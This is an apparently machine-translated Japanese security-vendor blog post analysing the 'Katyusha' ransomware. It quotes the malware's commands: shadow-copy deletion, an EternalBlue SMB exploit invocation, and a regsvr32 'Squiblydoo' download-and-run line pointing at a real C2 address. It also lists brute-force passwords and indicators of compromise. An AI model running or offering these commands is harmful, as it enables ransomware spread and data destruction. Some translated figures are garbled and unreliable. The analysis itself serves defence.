• 製品とサービス
        • クラウド

          • エンドポイント保護
          • エンドポイントの検出と応答
          • モバイルデバイス管理
          • BYOD
          • 拡張された検出と応答
          • ゼロトラストネットワークアクセス
          • Data Privacy
        • オンプレミス

          • エンドポイント保護
          • エンドポイントの検出と応答
          • Data Privacy
        • Platform

          • マルウェア分析プラットフォーム
        • ディーラー&卸売

          • SOHOトータルエディション
        • サービス

          • 脅威情報
          • デジタルリスク保護サービス(DRPS)
          • ランサムウェア復旧サービス (RRaaS)
          • DPDPコンプライアンス
          • 管理された検出と応答
  • ソリューション
    • 金融・保険
    • 学位
    • 政府・公共機関
    • 健康
    • ITeS
    • 製造現場
  • 貴社名
    • Seqriteについて
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • パートナー
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • リソース
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • データプライバシーを理解する
    • DPDP対話
情報技術、ネットワーク、サイバーセキュリティに関するブログ | Seqrite Blog
営業担当者へ連絡
  • 製品とサービス
        • クラウド

          • エンドポイント保護
          • エンドポイントの検出と応答
          • モバイルデバイス管理
          • BYOD
          • 拡張された検出と応答
          • ゼロトラストネットワークアクセス
          • Data Privacy
        • オンプレミス

          • エンドポイント保護
          • エンドポイントの検出と応答
          • Data Privacy
        • Platform

          • マルウェア分析プラットフォーム
        • ディーラー&卸売

          • SOHOトータルエディション
        • サービス

          • 脅威情報
          • デジタルリスク保護サービス(DRPS)
          • ランサムウェア復旧サービス (RRaaS)
          • DPDPコンプライアンス
          • 管理された検出と応答
  • ソリューション
    • 金融・保険
    • 学位
    • 政府・公共機関
    • 健康
    • ITeS
    • 製造現場
  • 貴社名
    • Seqriteについて
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • パートナー
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • リソース
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • データプライバシーを理解する
    • DPDP対話
ホーム  /  ランサムウェア  / 高度なランサムウェア:「カチューシャ」
高度なランサムウェア「カチューシャ」
14 12月 2018

高度なランサムウェア「カチューシャ」

著者 ガンシャム・モア
ガンシャム・モア
ランサムウェア
17
株式

Quick Heal Security Labsは数ヶ月にわたり、ランサムウェアの増加を観察してきましたが、新たに興味深いランサムウェアを発見しました。このランサムウェアはファイルを暗号化し、「.katyusha」という拡張子を追加し、0.5日以内にXNUMXビットコインを要求し、支払わない場合はデータを一般公開してダウンロードさせると脅迫します。このマルウェアは、「ダブルパルサー"と"永遠の青” エクスプロイトはネットワーク上で拡散するために使用されます。また、「スクイブリードゥー” はネットワーク上で拡散します。このランサムウェアの感染経路はまだ確認されていませんが、情報源から判断すると、スピアフィッシング、マルバタイジング、スパムメール、SMBエクスプロイトなどを介してシステムに侵入する可能性があります。

テクニカル分析:

このマルウェアはMPRESS(v2.19)でパックされており、被害者のシステム上に「カチューシャ.exe” が「%temp%」にあります。このマルウェアには3つのコンポーネントが含まれています。実行されると、これらのコンポーネントは C:\Windows\Temp にドロップされ、実行が開始されます。

  • Svchost0.bat
  • Zkts.exe
  • Ktsi.exe

Katyusha はシステム上の次のファイルをチェックし、システムがすでに感染しているかどうかを判断します。

「C:\how_to_decrypt_you_files.txt」

「C:\ProgramData\_how_to_decrypt_you_files.txt」

システムが既に感染している場合、Katyushaは図0に示すコードを含むバッチファイル(svchost1.bat)を作成し、自己コピーを削除して自身を終了します。システムが感染していない場合は、zkts.exeとktsi.exeをドロップして実行します。

図1: Svchost0.batの内容

 

Zkts.exe:

このファイルは 7zip で圧縮された実行可能ファイルであり、ネットワーク拡散モジュール、パスワード窃盗モジュールなどの複数のサブモジュールを含むメイン コンポーネントです。

zkts.exeを実行すると、「C:\ Windows \ Temp” には Mimikatz、katyusha.dll、eternal blue exploit などがあり、これらは後に Katyusha によってアクティビティを実行するために使用されます。

図2.zkts.exeによってドロップされたファイル

 

Ktsi.exe (暗号化者):

これはもう一つの主要コンポーネントであり、MPRESSで圧縮されたファイルです。主にファイルの暗号化と、被害者のシステムに身代金要求メッセージを表示するために使用されます。このプロセスは、図3に示すように、メインペイロード(katyusha.exe)によって独立して開始されます。

図3: ktsi.exeのCreateProcess()の呼び出し

 

ktsi.exe を実行すると、まず、図 4 に示すように、次のタスクのリストを強制終了して、暗号化に関連するプロセスによってロックされているファイル (db ファイルなど) のハンドルを解放します。

データベース関連ファイルの暗号化を成功させるために、ktsiはデータベースアプリケーションに関連するプロセスを強制終了します。マルウェアにハードコードされているプロセスのリストは以下のとおりです。

mysqld.exe  httpd.exe  sqlsevr.exe
sqlwriter.exe  w3wp.exe  sqlagent.exe
fdhost.exe  fdlauncher.exe  reportingservicesservice.exe
omtsreco.exe   tnslsnr.exe   oracle.exe
emagent.exe  mysqld-nt.exe
図 4: Taskkill コマンドの実行。

タスクキル操作後、マルウェアはシステム起動時にすべてのユーザーが閲覧できるように、以下のパスにHTMLおよびTXT形式の身代金要求メモをドロップします。

「C:\ProgramData\Microsoft\Windows\スタートメニュー\プログラム\スタートアップ」

_how_to_decrypt_you_files.txt

ファイルの暗号化解除方法.html

「C:\ProgramData」とCドライブのルート(C:\)に、「_how_to_decrypt_you_files.txt」という身代金要求メモのみをドロップします。

 

図5: 身代金要求書

Ktsi.exeは次のコマンドを実行してシャドウコピーも削除します。

「vssadmin シャドウの削除 /all /quiet」

図6: シャドウコピーの削除

 

これらのすべてのタスクの後、ktsi.exeは標準的な暗号化方法の助けを借りてファイルの暗号化(RSA)を開始します。 クリプトガムこのアルゴリズムに関連する署名は、図 7 に示すようにファイル内にあります。

図 7: 隠花植物の紐。

 

以下のファイルを除くすべての拡張ファイルを暗号化します。

図 8: 暗号化から除外された拡張子。

また、ファイルとフォルダの除外リストも含まれています(図9参照)。列挙されたファイルパスにこれらの単語が含まれている場合、そのパスは暗号化から除外されます。中断のない暗号化を実行するために、リストにはいくつかのセキュリティ製品の名前が含まれています。

図 9: ファイルとフォルダーの除外リスト。

 

拡散メカニズム:

ネットワーク拡散には、zktsから抽出されたファイルが重要な役割を果たします。抽出されたコンポーネントについては、図2を参照してください。

m32.exe と m64.exe は、Windows の lsass.exe から資格情報を取得するために使用される Mimikatz ツールです。

まず、katyusha.exe はシステム コール IsWow64Process (システムが 32 ビットの場合は 64 以外の値を返します) を使用してシステムが 64 ビットか XNUMX ビットかを判断し、システム アーキテクチャに応じて Mimikatz を実行します。

Mimikatzツールは次のファイルをドロップします。 「C:\Windows\Temp」 出力として。

– snamelog: 取得したユーザー名が含まれます。

– spasslog: 取得したユーザー名ごとのパスワードが含まれます。

図 10: システム タイプを確認し、Mimikatz を起動します。

mimikatz の実行後、katyusha.exe は snamelog からユーザー名を読み取り、spasslog からパスワードを読み取り、ネットワークへのブルート フォース攻撃を実行します。

Zkts.exeは、svchostb.exe、svchostb.xml、svchostbs.exe、svchostbs.xml、katyusha.dll、およびsvchostp.exeもドロップします。これらのコンポーネントは、Katyushaをネットワーク経由で拡散するために使用されます。

マルウェアは、ドロップされたEternal BlueエクスプロイトとDouble Pulsarを利用して、ネットワークに接続されたシステム上でkatyusha.dllを順次実行します。このkatyusha.exeは、以下のコマンドを使用してSMBの脆弱性を悪用します。

「C:\windows\temp\&svchostb.exe –TargetIp & svchostbs.exe –OutConfig s –TargetPort 445 –プロトコル SMB –アーキテクチャ x64 –関数 RunDLL –DllPayload katyusha.dll –TargetIp ”

図 11: ネットワーク内の各システムでのエクスプロイトの実行。

Katyusha.dllは、以下のコマンドを実行するコードを含むペイロードファイルです。

「regsvr32 /u /s /i:hxxp://86.106.102.147/img/katyusha.data scrobj.dll」

図 12 に示すように、ファイル内にはハードコードされたコマンド文字列も見つかります。

図12: URLからスクリプトをダウンロードして実行するコマンド

上記のregsvr32(Microsoft Register Server)コマンドを実行すると、指定されたURLからスクリプト(katyusha.data)がダウンロードされ、regsvr32(/u)パラメータを使用してサーバーの登録解除が実行されます。これにより、以下のJavaScriptコードが実行されます。図13に示すように、ダウンロードしたスクリプトレットからタグを削除します。スクリプトには、指定されたURLからkatyusha.exeをダウンロードするコードが含まれています。 "%Temp%" ディレクトリを作成して実行します。

図13: katyusha.dataスクリプトの内容
図 14: 感染したシステム内のスクリプトとペイロードのダウンロード要求。

regsvr32コマンドを使用してC&Cからスクリプトレットをダウンロードして実行するこのような攻撃は、 「スクイブリードゥー」.

上記のアクションの後、Power Admin Tool(svchostp.exe)を使用して、ネットワーク内のシステムに対してブルートフォース攻撃を実行します。このツールはsysinternalsに似ています。 PsExecは リモートシステム上でプロセスを実行するために使用されるツールです。このランサムウェア自体には、以下に示すいくつかのユーザー名とパスワードのリストがあり、さらにMimikatz(snamelogおよびspasslog)によって取得されたユーザー名とパスワードもブルートフォース攻撃に使用します。

ユーザー名:

管理者、管理者、+snamelog の内容。

パスワード:

admin、12345、chinachina203、111、123456、qwerty、test、abc123、12345678、0000、1122、1234、+spasslog の内容。

ブルートフォースでは、カチューシャは次のコマンドを使用します。

「C:\Windows\temp\svchostp.exe -u -p -n 10 -s regsvr32 /u /s /i:https://86.106.102.147/img/katyusha.data scrobj.dll”

上記のコマンドは、URL をパラメータとして regsvr32 ユーティリティを実行し、ペイロードをダウンロードして、katyusha.dll について上記で説明したアクティビティを実行します。

図15.電源管理ツール(svchostp.exe)の使用

IOC:

   MD5: 7f87db33980c0099739de40d1b725500

   URL:

  1.  hxxp://86.106.102.147/img/katyusha.data
  2. hxxp://86.106.102.147/img/katyusha.exe

   ビットコインウォレットアドレス: “3ALmvAWLEothnMF5BjckAFaKB5S6zan9PK”

結論:

今年はランサムウェアの数が急増しており、新たな拡散手法やデータ暗号化手法が用いられています。現在、ほとんどのランサムウェアには、ネットワーク上で拡散するためのエクスプロイトやEternal Blue、Mimikatzなどのツールがバンドルされています。ユーザーの皆様には、疑わしいURLやメールへのアクセスを避け、強力なシステム認証情報を使用し、アンチウイルスソフトを最新の状態に保つことをお勧めします。

主題専門家:

Pratik Pachpor | クイックヒールセキュリティラボ

 以前の投稿CVE-2018-15982 - Adob​​e Flash Player の use-after-free (ゼロデイ) の脆弱性...
次の投稿  ゴーストがやってきた
ガンシャム・モア

Ghanshyamについて

ガンシャムはクイックヒール・セキュリティ・ラボのセキュリティ研究者です。セキュリティの脆弱性のリバースエンジニアリングと分析に興味があり、…

Ghanshyamによる記事 もっと見る »

関連記事

  • 公開共有SMB2接続を介したランサムウェア攻撃とSeqriteによる保護

    2025 年 3 月 11 日
  • 攻撃者がBitLockerを悪用する方法:正規のツールをランサムウェアの武器に変える

    2025 年 3 月 11 日
  • 中小企業の脆弱性:「WantToCry」ランサムウェア攻撃の背後にある隠れたリスク

    2025 年 1 月 31 日
注目の著者
  • セクライト
    セクライト

    Seqriteは、エンタープライズ向けサイバーセキュリティソリューションのリーディングプロバイダーです。…

    続きを読む..
  • ジョティ・カルレカー
    ジョティ・カルレカー

    私は、新興テクノロジーに関するコンテンツの作成を楽しむ熱心なライターです。

    続きを読む..
  • ビニーシュ・P
    ビニーシュ・P

    私はサイバーセキュリティに情熱を注ぎ、熱心なライターでもあります。得意分野は…

    続きを読む..
  • サンジェイ・カトカル
    サンジェイ・カトカル

    Sanjay Katkar 氏は、Quick Heal Technologies の共同マネージング ディレクターです。

    続きを読む..
トピック
apt (25) サイバー攻撃 (36) サイバー攻撃 (58) サイバー攻撃 (16) サイバー攻撃 (15) Cybersecurity (335) サイバーセキュリティ (34) サイバー脅威 (33) サイバー脅威 (50) データ侵害 (56) データ侵害 (29) データ損失 (28) データ損失防止 (34) データプライバシー (15) データ保護 (32) データセキュリティ (17) DLP (50) DPDP (14) DPDPA (16) Encryption (16) エンドポイントセキュリティ (110) エンタープライズセキュリティ (18) 悪用する (13) GDPR (13) マルウェア (76) マルウェア分析 (13) マルウェア攻撃 (23) マルウェア攻撃 (12) MDM (27) Microsoft (15) ネットワークセキュリティ (24) パッチ管理 (12) フィッシング詐欺 (29) ランサムウェア (69) ransomware攻撃 (30) ransomware攻撃 (30) ransomwareの保護 (14) セクライト (41) Seqrite暗号化 (27) セクライト EPS (33) Seqriteサービス (16) 脅威情報 (13) UTM (34) 脆弱性 (16) ゼロトラスト (13)
情報技術、ネットワーク、サイバーセキュリティに関するブログ | Seqrite

世界中でクラス最高の脅威防止、検出、対応ソリューションによりエンドポイント、データ、ネットワークのセキュリティを簡素化する、大手エンタープライズ IT セキュリティ ソリューション プロバイダーです。

つづきを読む

私たちに従ってください:

ニュースレターに登録

最新のサイバーセキュリティのトレンドと洞察に関する情報を入手してください。

ローディング
製品とサービス
  • クラウド
  • エンドポイント保護
  • エンドポイントの検出と応答
  • モバイルデバイス管理
  • BYOD
  • 拡張された検出と応答
  • ゼロトラストネットワークアクセス
  • Data Privacy
  • オンプレミス
  • エンドポイント保護
  • エンドポイントの検出と応答
  • Data Privacy
  • Platform
  • マルウェア分析プラットフォーム
  • マイクロビジネス
  • SOHOトータルエディション
  • サービス
  • 脅威情報
  • デジタルリスク保護サービス(DRPS)
  • ランサムウェア復旧サービス (RRaaS)
  • DPDPコンプライアンス
  • 管理された検出と応答
リソース
  • ブログ
  • ホワイトペーパー
  • データシート
  • 脅威レポート
  • マニュアル
  • PoV
  • データプライバシーを理解する
  • DPDP対話
  • ポリシーとコンプライアンス
  • EULA
  • ゴーディープ
  • SIA
お問い合わせ
  • 登記事務所
  • 最寄りのオフィス
  • サイバーセキュリティについて話しましょう
サポート
  • テクニカルサポート
  • ソフトウェア・ダウンロード
  • オフラインアップデータ
  • ファームウェア・アップグレード
  • アップグレード
  • 製品ドキュメント
私たちに関しては
  • Seqriteについて
  • リーダーシップ
  • 受賞
  • ニュースルーム
Partner
  • パートナープログラム
  • パートナーを探す
  • パートナーになる
  • Seqrite認定

© 2026 クイックヒールテクノロジーズ株式会社

サイトマップ プライバシーポリシー 法的通知 クッキーポリシー 利用規約